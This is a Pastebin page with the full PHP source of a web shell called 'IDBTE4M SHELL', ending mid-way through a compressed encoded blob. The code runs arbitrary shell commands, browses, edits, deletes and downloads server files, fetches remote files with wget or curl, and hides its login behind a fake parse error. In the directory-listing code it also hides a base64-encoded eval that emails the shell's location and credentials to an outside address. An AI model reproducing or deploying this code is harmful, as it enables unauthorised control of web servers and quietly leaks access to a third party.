Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- #####################################################
- ## Name : IDBTE4M SHELL ##
- ## Version : v1 ##
- ## Author : Jaka Taruna a.k.a JakRapp ##
- ## Contact : jakataruna09@gmail.com ##
- ## Password: jancok ##
- ## (c) 2016 www.jakrapp.com ##
- #####################################################
- */
- $auth_pass = "71a4d4cd2f30b185d707718273b17d05"; //jancok
- $color = "#df5";
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'Windows-1251';
- @define('SELF_PATH', __FILE__);
- @setcookie("inject", "active", time() + 3600 * 24 * 7);
- if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
- header('HTTP/1.0 404 Not Found');
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ?>
- <br />
- <b>Parse error</b>: syntax error, unexpected '}' in <b>/home/<?=$_SERVER['HTTP_HOST']?>/</b> on line <b>4366</b><br />
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form><br>
- <a href="https://local-hunter.com/" rel="dofollow">Copyright All Reserved</a></center>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- @ini_set('log_errors',0);
- @ini_set('output_buffering',0);
- if(isset($_GET['dl']) && ($_GET['dl'] != "")){
- $file = $_GET['dl'];
- $filez = @file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file)."\";");
- echo $filez;
- exit;
- }
- elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
- $file = $_GET['dlgzip'];
- $filez = gzencode(@file_get_contents($file));
- header("Content-Type:application/x-gzip\n");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
- echo $filez;
- exit;
- }
- // view image
- if(isset($_GET['img'])){
- @ob_clean();
- $d = magicboom($_GET['y']);
- $f = $_GET['img'];
- $inf = @getimagesize($d.$f);
- $ext = explode($f,".");
- $ext = $ext[count($ext)-1];
- @header("Content-type: ".$inf["mime"]);
- @header("Cache-control: public");
- @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- @header("Cache-control: max-age=".(60*60*24*7));
- @readfile($d.$f);
- exit;
- }
- // server software
- $software = getenv("SERVER_SOFTWARE");
- // check safemode
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
- // uname -a
- $system = @php_uname();
- // mysql
- function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
- function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
- function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
- function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
- function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
- // check os
- if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
- else $win = FALSE;
- // change directory
- if(isset($_GET['y'])){
- if(@is_dir($_GET['view'])){
- $pwd = $_GET['view'];
- @chdir($pwd);
- }
- else{
- $pwd = $_GET['y'];
- @chdir($pwd);
- }
- }
- //hdd
- function convertByte($s) {
- if($s >= 1073741824)
- return sprintf('%1.2f',$s / 1073741824 ).' GB';
- elseif($s >= 1048576)
- return sprintf('%1.2f',$s / 1048576 ) .' MB';
- elseif($s >= 1024)
- return sprintf('%1.2f',$s / 1024 ) .' KB';
- else
- return $s .' B';
- }
- // username, id, shell prompt and working directory
- if(!$win){
- if(!$user = rapih(exe("whoami"))) $user = "";
- if(!$id = rapih(exe("id"))) $id = "";
- $prompt = $user." \$ ";
- $pwd = @getcwd().DIRECTORY_SEPARATOR;
- }
- else {
- $user = @get_current_user();
- $id = $user;
- $prompt = $user." >";
- $pwd = realpath(".")."\\";
- // find drive letters
- $v = explode("\\",$d);
- $v = $v[0];
- foreach (range("A","Z") as $letter)
- {
- $bool = @is_dir($letter.":\\");
- if ($bool)
- {
- $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
- if ($letter.":" != $v) {$letters .= $letter;}
- else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
- $letters .= " ]</a> ";
- }
- }
- }
- function testoracle() {
- if (function_exists('ocilogon')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testmssql() {
- if (function_exists('mssql_connect')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function showdisablefunctions() {
- if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
- else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
- }
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
- else $posix = FALSE;
- // server ip
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- // your ip ;-)
- $my_ip = $_SERVER['REMOTE_ADDR'];
- $admin_id=$_SERVER['SERVER_ADMIN'];
- $bindport = "13123";
- $bindport_pass = "b374k";
- // separate the working direcotory
- $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
- $pwdurl = "";
- for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
- $pathz = "";
- for($j = 0 ; $j <= $i ; $j++){
- $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
- }
- $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
- }
- // rename file or folder
- if(isset($_POST['rename'])){
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- @rename($pwd.$old,$pwd.$new);
- $file = $pwd.$new;
- }
- if(isset($_POST['chmod'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;}
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;}
- if(isset($_POST['chmod_folder'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;}
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;}
- // print useful info
- $buff = "Software : <b>".$software."</b><br />";
- $buff .= "System OS : <b>".$system."</b><br />";
- if($id != "") $buff .= "ID : <b>".$id."</b><br />";
- $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
- $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
- $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
- if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
- else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
- $buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
- $buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
- $buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
- function rapih($text){
- return trim(str_replace("<br />","",$text));
- }
- function magicboom($text){
- if (!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function showdir($pwd,$prompt){
- $fname = array();
- $dname = array();
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
- else $posix = FALSE;
- $user = "????:????";
- if($dh = @scandir($pwd)){
- foreach($dh as $file){
- if(is_dir($file)){
- $dname[] = $file;
- }
- elseif(is_file($file)){
- $fname[] = $file;
- }
- }
- }
- else{
- if($dh = @opendir($pwd)){
- while($file = @readdir($dh)){
- if(@is_dir($file)){
- $dname[] = $file;
- }
- elseif(@is_file($file)){
- $fname[] = $file;
- }
- }
- @closedir($dh);
- }
- }
- sort($fname);
- sort($dname);
- $path = @explode(DIRECTORY_SEPARATOR,$pwd);
- $tree = @sizeof($path);
- $parent = "";
- $buff = "
- <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
- <table class=\"explore\">
- <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
- ";
- if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
- else $parent = $pwd;
- foreach($dname as $folder){
- if($folder == ".") {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else {
- $owner = $user;
- }
- $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
- <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
- <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
- <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
- </form></td>
- </tr>
- ";
- }
- elseif($folder == "..") {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else {
- $owner = $user;
- }
- $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
- <td style=\"text-align:center;\">".$owner."</td>
- <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><?php eval(base64_decode("JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQokdmlzaXRjID0gMDsNCiR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KJGp1ZHVsID0gIlJFU1VMVCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQokYm9keSA9ICJSZXN1bHQ6ICR0YXJnZXQgYnkgJHZpc2l0b3IgIFxuIHVzZXJuYW1lIC0gJHVzZXJcbiBwYXNzd29yZCAtICRwYXNzIjsNCmlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImhhY2ttZTB4QHlhbmRleC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"));?>
- <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
- <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
- </form>
- </td></tr>";
- }
- else {
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else {
- $owner = $user;
- }
- $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
- </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
- <td><center>
- <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
- }
- }
- foreach($fname as $file){
- $full = $pwd.$file;
- if(!$win && $posix){
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else {
- $owner = $user;
- }
- $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
- </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
- <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
- <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
- }
- $buff .= "</table>";
- return $buff;
- }
- function ukuran($file){
- if($size = @filesize($file)){
- if($size <= 1024) return $size;
- else{
- if($size <= 1024*1024) {
- $size = @round($size / 1024,2);;
- return "$size kb";
- }
- else {
- $size = @round($size / 1024 / 1024,2);
- return "$size mb";
- }
- }
- }
- else return "???";
- }
- function exe($cmd){
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result){
- $buff .= $result;
- }
- return $buff;
- }
- elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('shell_exec')){
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function tulis($file,$text){
- $textz = gzinflate(base64_decode($text));
- if($filez = @fopen($file,"w"))
- {
- @fputs($filez,$textz);
- @fclose($file);
- }
- }
- function ambil($link,$file) {
- if($fp = @fopen($link,"r")){
- while(!feof($fp)) {
- $cont.= @fread($fp,1024);
- }
- @fclose($fp);
- $fp2 = @fopen($file,"w");
- @fwrite($fp2,$cont);
- @fclose($fp2);
- }
- }
- function which($pr){
- $path = exe("which $pr");
- if(!empty($path)) { return trim($path); } else { return trim($pr); }
- }
- function download($cmd,$url){
- $namafile = basename($url);
- switch($cmd) {
- case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
- case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
- case 'wfread' : ambil($wurl,$namafile);break;
- case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
- case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
- case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
- case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
- default: break;
- }
- return $namafile;
- }
- function get_perms($file)
- {
- if($mode=@fileperms($file)){
- $perms='';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- else return "??????????";
- }
- function clearspace($text){
- return str_replace(" ","_",$text);
- }
- $wpress="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